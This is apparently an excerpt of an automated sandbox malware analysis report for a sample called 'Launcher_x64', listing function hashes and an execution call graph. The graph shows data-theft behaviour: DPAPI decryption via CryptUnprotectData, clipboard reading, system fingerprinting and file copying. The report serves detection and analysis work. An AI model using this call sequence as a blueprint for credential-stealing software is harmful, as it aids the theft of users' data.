                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _strcspn
                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                        • API String ID: 3709121408-2766056989
                                                                                                                                                                                                                                                                                        • Opcode ID: 04a7ba87b1e7df78b3e1d97b2c647dbe7c85ea5d39be17f7aaaf40baf81e5118
                                                                                                                                                                                                                                                                                        • Instruction ID: e8326018d1d9473a0fd6fdf1c772b1e66621cf0ea287dfa24a9357d628c3a0ff
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04a7ba87b1e7df78b3e1d97b2c647dbe7c85ea5d39be17f7aaaf40baf81e5118
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA32C4B49052698FDB14DF64C981B9DFBF1BF48300F0585AAE88DA7351D730AA85CFA1
                                                                                                                                                                                                                                                                                        Function 00D27AE3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00D1D04D,?,?,?,00000055,?,-00000050,?,?,?), ref: 00D27BA2
                                                                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00D1D04D,?,?,?,00000055,?,-00000050,?,?), ref: 00D27BD9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                                                        • String ID: utf8
                                                                                                                                                                                                                                                                                        • API String ID: 943130320-905460609
                                                                                                                                                                                                                                                                                        • Opcode ID: 815f3c6d89176750f160a63a57c2a0c7ee81b9d5eac64e1de8f3afb5bdced2f8
                                                                                                                                                                                                                                                                                        • Instruction ID: a684d1ddf9c2066c4642cdb529d538a93ebfd6ec67fe451723e648d8d367294d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 815f3c6d89176750f160a63a57c2a0c7ee81b9d5eac64e1de8f3afb5bdced2f8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09511671A08321AADB35AB71EC42FBA73A8EF64708F180469FA45DB181FB70D940D775
                                                                                                                                                                                                                                                                                        Function 00D22C4A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D22B4B,?,?,00000000,00000000,00000000,?), ref: 00D22C6F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: EncodePointer
                                                                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                        • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                                                        • Opcode ID: 085dbb4d49eb33809942be9a2e986f87e671d758556dd38fb71b11218ebb0e18
                                                                                                                                                                                                                                                                                        • Instruction ID: 59674225448f26e6fe65cc4255fb2b84408fd8e463ce21aa2f9a658876acec4d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 085dbb4d49eb33809942be9a2e986f87e671d758556dd38fb71b11218ebb0e18
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE415B72900219BFCF15DF98ED81AEE7BB5FF68308F188099F90467221D3359961DBA1
                                                                                                                                                                                                                                                                                        Function 00D224B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00D2272D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                                                                        • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                                                        • Opcode ID: ab442a48b86844931e46a82c5d08626745082cb09e4190d0b5adf3c61f8e3191
                                                                                                                                                                                                                                                                                        • Instruction ID: 10cdc765b1db3b60bacc4045ddbd814b565e1eb8eeaab7d1dd4c98041baf4467
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab442a48b86844931e46a82c5d08626745082cb09e4190d0b5adf3c61f8e3191
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5031A136400229BBCF264F54E84187ABB66FF6871DB1C8559FC544A121C3B2DD61DBB2
                                                                                                                                                                                                                                                                                        Function 00D1308C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D13114
                                                                                                                                                                                                                                                                                        • RaiseException.KERNEL32(?,?,?,?), ref: 00D13139
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D17223: RaiseException.KERNEL32(E06D7363,00000001,00000003,00D15F93,?,?,?,?,00D15F93,00001000,00D3E1AC,00001000), ref: 00D17284
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D1F7B9: IsProcessorFeaturePresent.KERNEL32(00000017,00D1A37B,?,?,?,?,00000000), ref: 00D1F7D5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                        • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                                                                        • Opcode ID: 432f64a3b700b3dd4e3842db495c8ff75ac6d962bfe820aa276ab8455ebad763
                                                                                                                                                                                                                                                                                        • Instruction ID: 4927b0276cdcd7d6933414976c06b86d90ca4274e2d159efdb06552996297a3a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 432f64a3b700b3dd4e3842db495c8ff75ac6d962bfe820aa276ab8455ebad763
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA213A32D00318BBCF24DF95E9459EEB7B9EF08710F580419E519AB650DA30AEC5CBB1

                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                        Execution Coverage:9.7%
                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                        Signature Coverage:57.9%
                                                                                                                                                                                                                                                                                        Total number of Nodes:413
                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:29
                                                                                                                                                                                                                                                                                        execution_graph 13261 40df40 13266 432740 13261->13266 13267 432775 GetSystemMetrics GetSystemMetrics 13266->13267 13268 4327b8 13267->13268 13510 42fe63 CoSetProxyBlanket 13511 43c9e2 13512 43ca20 13511->13512 13512->13512 13513 43cb7e 13512->13513 13515 43c390 LdrInitializeThunk 13512->13515 13515->13513 13269 4162c4 13270 4162c9 13269->13270 13271 416553 13270->13271 13274 4163c3 13270->13274 13286 41656d 13270->13286 13305 419930 13271->13305 13275 416737 13274->13275 13276 416486 13274->13276 13279 416542 13274->13279 13274->13286 13277 41bf20 3 API calls 13275->13277 13293 41bf20 13276->13293 13277->13279 13280 4167d7 13288 41689e 13280->13288 13337 43c390 LdrInitializeThunk 13280->13337 13281 4168d6 13339 43c390 LdrInitializeThunk 13281->13339 13283 418707 13286->13275 13286->13279 13286->13286 13289 43e6c0 13286->13289 13288->13279 13288->13281 13338 43c390 LdrInitializeThunk 13288->13338 13290 43e6e0 13289->13290 13292 43e81e 13290->13292 13340 43c390 LdrInitializeThunk 13290->13340 13292->13286 13294 41bf50 13293->13294 13341 413de0 13294->13341 13296 41c078 13297 413de0 3 API calls 13296->13297 13298 41c108 13297->13298 13299 413de0 3 API calls 13298->13299 13300 41c18e 13299->13300 13301 413de0 3 API calls 13300->13301 13302 41c23f 13301->13302 13303 413de0 3 API calls 13302->13303 13304 41c2c7 13303->13304 13304->13279 13306 419960 13305->13306 13310 4199ce 13306->13310 13445 43c390 LdrInitializeThunk 13306->13445 13308 419ace 13313 419b7e 13308->13313 13330 416558 13308->13330 13447 43c390 LdrInitializeThunk 13308->13447 13310->13308 13446 43c390 LdrInitializeThunk 13310->13446 13312 419c6f 13314 43a8a0 RtlFreeHeap 13312->13314 13313->13312 13321 419cc9 13313->13321 13448 43c390 LdrInitializeThunk 13313->13448 13314->13321 13316 41a027 FreeLibrary 13320 419ec7 13316->13320 13318 419ec2 13318->13316 13319 419f86 FreeLibrary 13318->13319 13323 419fb0 13319->13323 13320->13330 13450 43c390 LdrInitializeThunk 13320->13450 13321->13316 13321->13318 13321->13320 13321->13330 13449 43c390 LdrInitializeThunk 13321->13449 13325 41a022 13323->13325 13451 43c390 LdrInitializeThunk 13323->13451 13328 41a18e 13325->13328 13452 43c390 LdrInitializeThunk 13325->13452 13327 41a9e8 13329 43a8a0 RtlFreeHeap 13327->13329 13328->13330 13334 41a27e 13328->13334 13453 43c390 LdrInitializeThunk 13328->13453 13329->13330 13330->13280 13330->13281 13330->13286 13330->13288 13332 43ab80 LdrInitializeThunk 13332->13334 13333 43ad00 LdrInitializeThunk 13333->13334 13334->13327 13334->13332 13334->13333 13335 43a8a0 RtlFreeHeap 13334->13335 13336 43c390 LdrInitializeThunk 13334->13336 13335->13334 13336->13334 13337->13288 13338->13288 13339->13283 13340->13292 13342 413e00 13341->13342 13366 43e510 13342->13366 13344 4141e0 13348 41436d 13344->13348 13349 4141f7 13344->13349 13361 414397 13344->13361 13363 414221 13344->13363 13394 43e870 13344->13394 13345 41419a 13345->13344 13345->13348 13345->13349 13350 414332 13345->13350 13351 41430d 13345->13351 13352 4142ef 13345->13352 13345->13361 13345->13363 13370 43a8d0 13345->13370 13346 413f2d 13346->13344 13346->13345 13346->13346 13347 43e510 LdrInitializeThunk 13346->13347 13346->13349 13346->13363 13347->13345 13348->13349 13348->13361 13348->13363 13398 43e950 13348->13398 13349->13296 13390 43ad00 13350->13390 13351->13344 13351->13348 13351->13349 13351->13350 13356 43e510 LdrInitializeThunk 13351->13356 13351->13361 13351->13363 13352->13344 13352->13348 13352->13349 13352->13350 13352->13351 13352->13361 13352->13363 13382 43adc0 13352->13382 13356->13350 13361->13349 13361->13363 13404 43c390 LdrInitializeThunk 13361->13404 13363->13349 13405 43c390 LdrInitializeThunk 13363->13405 13406 438680 13363->13406 13367 43e530 13366->13367 13368 43e66e 13367->13368 13423 43c390 LdrInitializeThunk 13367->13423 13368->13346 13371 43a8f0 13370->13371 13373 43a95e 13371->13373 13424 43c390 LdrInitializeThunk 13371->13424 13375 4142e3 13373->13375 13377 43aa5e 13373->13377 13425 43c390 LdrInitializeThunk 13373->13425 13378 43ab80 13375->13378 13426 43a8a0 13377->13426 13379 43ac5e 13378->13379 13380 43ab92 13378->13380 13379->13352 13380->13379 13430 43c390 LdrInitializeThunk 13380->13430 13383 43ae77 13382->13383 13385 43adda 13382->13385 13383->13351 13384 43affe 13384->13383 13386 43ad00 LdrInitializeThunk 13384->13386 13385->13383 13388 43ae72 13385->13388 13431 43c390 LdrInitializeThunk 13385->13431 13386->13383 13388->13384 13432 43c390 LdrInitializeThunk 13388->13432 13391 43ad8e 13390->13391 13392 43ad0a 13390->13392 13391->13344 13392->13391 13433 43c390 LdrInitializeThunk 13392->13433 13395 43e890 13394->13395 13396 43e8fe 13395->13396 13434 43c390 LdrInitializeThunk 13395->13434 13396->13348 13399 43e970 13398->13399 13399->13399 13402 43e9de 13399->13402 13435 43c390 LdrInitializeThunk 13399->13435 13401 43ea9e 13401->13361 13402->13401 13436 43c390 LdrInitializeThunk 13402->13436 13404->13363 13405->13363 13408 438690 13406->13408 13412 438760 13408->13412 13437 43c330 13408->13437 13444 43c390 LdrInitializeThunk 13408->13444 13410 438aab 13411 43a8a0 RtlFreeHeap 13410->13411 13414 438ac4 13411->13414 13412->13410 13413 43ab80 LdrInitializeThunk 13412->13413 13419 4387a6 13413->13419 13414->13363 13415 438aaf 13416 43ad00 LdrInitializeThunk 13415->13416 13416->13410 13417 43c330 2 API calls 13417->13419 13418 43a8a0 RtlFreeHeap 13418->13419 13419->13415 13419->13417 13419->13418 13420 438ad1 13419->13420 13422 43c390 LdrInitializeThunk 13419->13422 13421 43a8a0 RtlFreeHeap 13420->13421 13421->13415 13422->13419 13423->13368 13424->13373 13425->13377 13427 43a8b3 13426->13427 13428 43a8c4 13426->13428 13429 43a8b8 RtlFreeHeap 13427->13429 13428->13375 13429->13428 13430->13379 13431->13388 13432->13384 13433->13391 13434->13396 13435->13402 13436->13401 13438 43c356 13437->13438 13439 43c375 13437->13439 13440 43c348 13437->13440 13443 43c36a 13437->13443 13442 43c35b RtlReAllocateHeap 13438->13442 13441 43a8a0 RtlFreeHeap 13439->13441 13440->13438 13440->13439 13441->13443 13442->13443 13443->13408 13444->13408 13445->13310 13446->13308 13447->13313 13448->13312 13449->13318 13450->13330 13451->13325 13452->13328 13453->13334 13516 40cde7 13517 40ce10 13516->13517 13520 437a30 13517->13520 13519 40cf31 13522 437a60 CoCreateInstance 13520->13522 13523 437d07 SysAllocString 13522->13523 13524 438255 13522->13524 13527 437d9c 13523->13527 13526 438265 GetVolumeInformationW 13524->13526 13533 43828a 13526->13533 13528 438244 SysFreeString 13527->13528 13529 437da4 CoSetProxyBlanket 13527->13529 13528->13524 13530 437dc4 SysAllocString 13529->13530 13531 43823a 13529->13531 13534 437e90 13530->13534 13531->13528 13533->13519 13534->13534 13535 437ed5 SysAllocString 13534->13535 13536 437efb 13535->13536 13537 43822b SysFreeString SysFreeString 13536->13537 13538 438221 13536->13538 13539 437f43 VariantInit 13536->13539 13537->13531 13538->13537 13541 437fa0 13539->13541 13540 438210 VariantClear 13540->13538 13541->13540 13454 40c708 CoInitializeSecurity CoInitializeSecurity 13455 42d78a 13456 42d7b0 13455->13456 13457 42db8a GetPhysicallyInstalledSystemMemory 13456->13457 13458 42dba9 13457->13458 13458->13458 13542 43cca8 13544 43ccd0 13542->13544 13543 43cd32 13544->13543 13546 43c390 LdrInitializeThunk 13544->13546 13546->13543 13547 409cac 13552 40ab70 13547->13552 13549 409cbe 13550 40ab70 2 API calls 13549->13550 13551 409ce2 13550->13551 13553 40ac00 13552->13553 13553->13553 13554 40ac25 13553->13554 13555 43c330 RtlFreeHeap RtlReAllocateHeap 13553->13555 13554->13549 13555->13553 13556 4085b0 13558 4085bc 13556->13558 13557 408692 ExitProcess 13558->13557 13559 40863a GetCurrentProcessId GetCurrentThreadId SHGetSpecialFolderPathW GetForegroundWindow 13558->13559 13560 40867b 13558->13560 13561 40866a 13559->13561 13567 43c310 13560->13567 13561->13560 13566 40c6c0 CoInitializeEx 13561->13566 13570 43d970 13567->13570 13569 43c315 FreeLibrary 13569->13557 13571 43d979 13570->13571 13571->13569 13459 42c393 13460 42c3b1 13459->13460 13463 437720 13460->13463 13464 43772e 13463->13464 13467 4377e9 13464->13467 13472 43c390 LdrInitializeThunk 13464->13472 13466 42c483 13467->13466 13469 4378be 13467->13469 13471 43c390 LdrInitializeThunk 13467->13471 13469->13466 13473 43c390 LdrInitializeThunk 13469->13473 13471->13467 13472->13464 13473->13469 13474 420b50 13475 420bb0 13474->13475 13476 420b5e 13474->13476 13478 420c70 13476->13478 13479 420c80 13478->13479 13479->13479 13480 43e6c0 LdrInitializeThunk 13479->13480 13481 420d6f 13480->13481 13482 43c591 13483 43c5a0 13482->13483 13486 43c390 LdrInitializeThunk 13483->13486 13485 43c65e 13486->13485 13572 435231 13573 435261 13572->13573 13574 435293 13573->13574 13576 43c390 LdrInitializeThunk 13573->13576 13576->13573 13487 42c911 13490 42c921 13487->13490 13488 42ce75 GetComputerNameExA 13488->13490 13489 42cf5b GetComputerNameExA 13489->13490 13490->13488 13490->13489 13491 43a8d0 13492 43a8f0 13491->13492 13494 43a95e 13492->13494 13499 43c390 LdrInitializeThunk 13492->13499 13496 43ab51 13494->13496 13498 43aa5e 13494->13498 13500 43c390 LdrInitializeThunk 13494->13500 13495 43a8a0 RtlFreeHeap 13495->13496 13498->13495 13499->13494 13500->13498 13577 40dcb9 13578 40dcd0 13577->13578 13581 40dd4e 13578->13581 13680 43c390 LdrInitializeThunk 13578->13680 13579 40de0e 13601 423220 13579->13601 13581->13579 13681 43c390 LdrInitializeThunk 13581->13681 13584 40de4d 13608 423960 13584->13608 13586 40de6d 13616 423c00 13586->13616 13588 40de8d 13626 426200 13588->13626 13594 40debf 13658 429ba0 13594->13658 13596 40dec8 13668 428950 13596->13668 13598 40dee8 13682 432580 OpenClipboard 13598->13682 13604 423280 13601->13604 13602 4233a0 13602->13584 13602->13602 13603 423681 GetLogicalDrives 13607 43e6c0 LdrInitializeThunk 13603->13607 13604->13602 13604->13604 13605 43e6c0 LdrInitializeThunk 13604->13605 13606 4234f1 13604->13606 13605->13606 13606->13602 13606->13603 13606->13606 13607->13602 13611 423a00 13608->13611 13609 423aef 13609->13586 13611->13609 13612 423db1 13611->13612 13691 43f090 13611->13691 13699 43eda0 13612->13699 13617 423c0e 13616->13617 13618 43ec80 LdrInitializeThunk 13617->13618 13620 423cd3 13618->13620 13619 43f090 2 API calls 13619->13620 13620->13619 13621 423db1 13620->13621 13624 423d0e 13620->13624 13622 43eda0 2 API calls 13621->13622 13623 423de4 13622->13623 13623->13624 13625 43ec80 LdrInitializeThunk 13623->13625 13624->13588 13625->13624 13628 426600 13626->13628 13633 40dead 13626->13633 13634 42622c 13626->13634 13627 43c330 2 API calls 13627->13634 13628->13628 13716 43f780 13628->13716 13629 43f090 2 API calls 13629->13634 13630 43ec80 LdrInitializeThunk 13630->13634 13632 43eda0 2 API calls 13632->13634 13636 426a70 13633->13636 13634->13627 13634->13628 13634->13629 13634->13630 13634->13632 13634->13633 13635 43c390 LdrInitializeThunk 13634->13635 13635->13634 13637 426a90 13636->13637 13640 426aee 13637->13640 13726 43c390 LdrInitializeThunk 13637->13726 13638 40deb6 13644 426ee0 13638->13644 13640->13638 13643 426bde 13640->13643 13727 43c390 LdrInitializeThunk 13640->13727 13641 43a8a0 RtlFreeHeap 13641->13638 13643->13641 13643->13643 13728 426f00 13644->13728 13646 426ef4 13646->13594 13647 426ee9 13647->13646 13749 438af0 13647->13749 13649 427875 CopyFileW 13650 427705 13649->13650 13650->13594 13651 43e510 LdrInitializeThunk 13655 4276db 13651->13655 13652 43e870 LdrInitializeThunk 13652->13655 13654 43e950 LdrInitializeThunk 13654->13655 13655->13649 13655->13650 13655->13651 13655->13652 13655->13654 13656 427b89 13655->13656 13756 43c390 LdrInitializeThunk 13656->13756 13659 429c40 13658->13659 13659->13659 13660 429dba 13659->13660 13661 429e49 13659->13661 13662 429e12 13659->13662 13663 43e510 LdrInitializeThunk 13659->13663 13667 429d03 13659->13667 13660->13661 13660->13662 13664 43e870 LdrInitializeThunk 13660->13664 13660->13667 13666 43e950 LdrInitializeThunk 13661->13666 13662->13661 13665 43e950 LdrInitializeThunk 13662->13665 13662->13667 13663->13660 13664->13662 13665->13661 13666->13667 13667->13596 13669 428990 13668->13669 13669->13669 13670 428ad0 13669->13670 13671 43e510 LdrInitializeThunk 13669->13671 13672 428f44 13669->13672 13670->13598 13671->13672 13673 42901a 13672->13673 13674 428f96 13672->13674 13675 43e870 LdrInitializeThunk 13672->13675 13677 428fdd 13672->13677 13673->13598 13674->13673 13676 43e950 LdrInitializeThunk 13674->13676 13674->13677 13675->13674 13676->13677 13677->13673 13781 43c390 LdrInitializeThunk 13677->13781 13679 429645 13680->13581 13681->13579 13683 4325a4 GetClipboardData 13682->13683 13684 40df11 13682->13684 13685 432722 CloseClipboard 13683->13685 13686 4325c1 GlobalLock 13683->13686 13685->13684 13688 4325d7 13686->13688 13687 432716 GlobalUnlock 13687->13685 13688->13687 13689 432605 GetWindowLongW 13688->13689 13690 43266f 13689->13690 13690->13687 13692 43f0b0 13691->13692 13695 43f11e 13692->13695 13711 43c390 LdrInitializeThunk 13692->13711 13693 43f3fc 13693->13611 13695->13693 13698 43f25e 13695->13698 13712 43c390 LdrInitializeThunk 13695->13712 13696 43a8a0 RtlFreeHeap 13696->13693 13698->13696 13700 43edc0 13699->13700 13702 43ee2e 13700->13702 13713 43c390 LdrInitializeThunk 13700->13713 13704 423de4 13702->13704 13706 43ef43 13702->13706 13714 43c390 LdrInitializeThunk 13702->13714 13703 43a8a0 RtlFreeHeap 13703->13704 13704->13609 13707 43ec80 13704->13707 13706->13703 13709 43eca0 13707->13709 13708 43ed6f 13708->13609 13709->13708 13715 43c390 LdrInitializeThunk 13709->13715 13711->13695 13712->13698 13713->13702 13714->13706 13715->13708 13717 43f78f 13716->13717 13719 43f90f 13717->13719 13724 43c390 LdrInitializeThunk 13717->13724 13721 43fb25 13719->13721 13723 43fa6e 13719->13723 13725 43c390 LdrInitializeThunk 13719->13725 13720 43a8a0 RtlFreeHeap 13720->13721 13721->13633 13723->13720 13724->13719 13725->13723 13726->13640 13727->13643 13729 426f40 13728->13729 13729->13729 13730 43a8d0 2 API calls 13729->13730 13731 426f9e 13730->13731 13732 43ab80 LdrInitializeThunk 13731->13732 13734 426faa 13732->13734 13733 43ad00 LdrInitializeThunk 13740 42752b 13733->13740 13738 426fb6 13734->13738 13739 42705c 13734->13739 13757 43b1f0 13734->13757 13736 4270bb 13736->13647 13736->13736 13738->13733 13739->13736 13739->13738 13739->13740 13767 43b120 13739->13767 13740->13647 13740->13740 13741 427970 13740->13741 13742 427875 CopyFileW 13740->13742 13743 43e510 LdrInitializeThunk 13740->13743 13744 43e870 LdrInitializeThunk 13740->13744 13746 43e950 LdrInitializeThunk 13740->13746 13747 427b89 13740->13747 13741->13647 13742->13741 13743->13740 13744->13740 13746->13740 13771 43c390 LdrInitializeThunk 13747->13771 13754 438b20 13749->13754 13750 43ec80 LdrInitializeThunk 13750->13754 13751 43f090 2 API calls 13751->13754 13752 438c58 13752->13655 13753 43f780 2 API calls 13753->13754 13754->13750 13754->13751 13754->13752 13754->13753 13780 43c390 LdrInitializeThunk 13754->13780 13756->13650 13759 43b240 13757->13759 13758 43b8ee 13758->13739 13766 43b2ae 13759->13766 13772 43c390 LdrInitializeThunk 13759->13772 13762 43b873 13762->13758 13777 43c390 LdrInitializeThunk 13762->13777 13764 43b120 LdrInitializeThunk 13764->13766 13765 43c390 LdrInitializeThunk 13765->13766 13766->13758 13766->13762 13766->13764 13766->13765 13773 43b040 13766->13773 13768 43b140 13767->13768 13768->13768 13769 43b1ae 13768->13769 13779 43c390 LdrInitializeThunk 13768->13779 13769->13739 13771->13736 13772->13766 13775 43b060 13773->13775 13774 43b0d8 13774->13766 13775->13774 13778 43c390 LdrInitializeThunk 13775->13778 13777->13758 13778->13774 13779->13769 13780->13754 13781->13679 13782 43a87f 13783 43a885 RtlAllocateHeap 13782->13783 13502 42c81f 13503 42c842 13502->13503 13503->13503 13504 42c8eb FreeLibrary 13503->13504 13784 4182bc 13786 4182c0 13784->13786 13785 418473 CryptUnprotectData 13786->13785 13505 42dedd 13507 42df10 13505->13507 13506 42dffe 13507->13506 13509 43c390 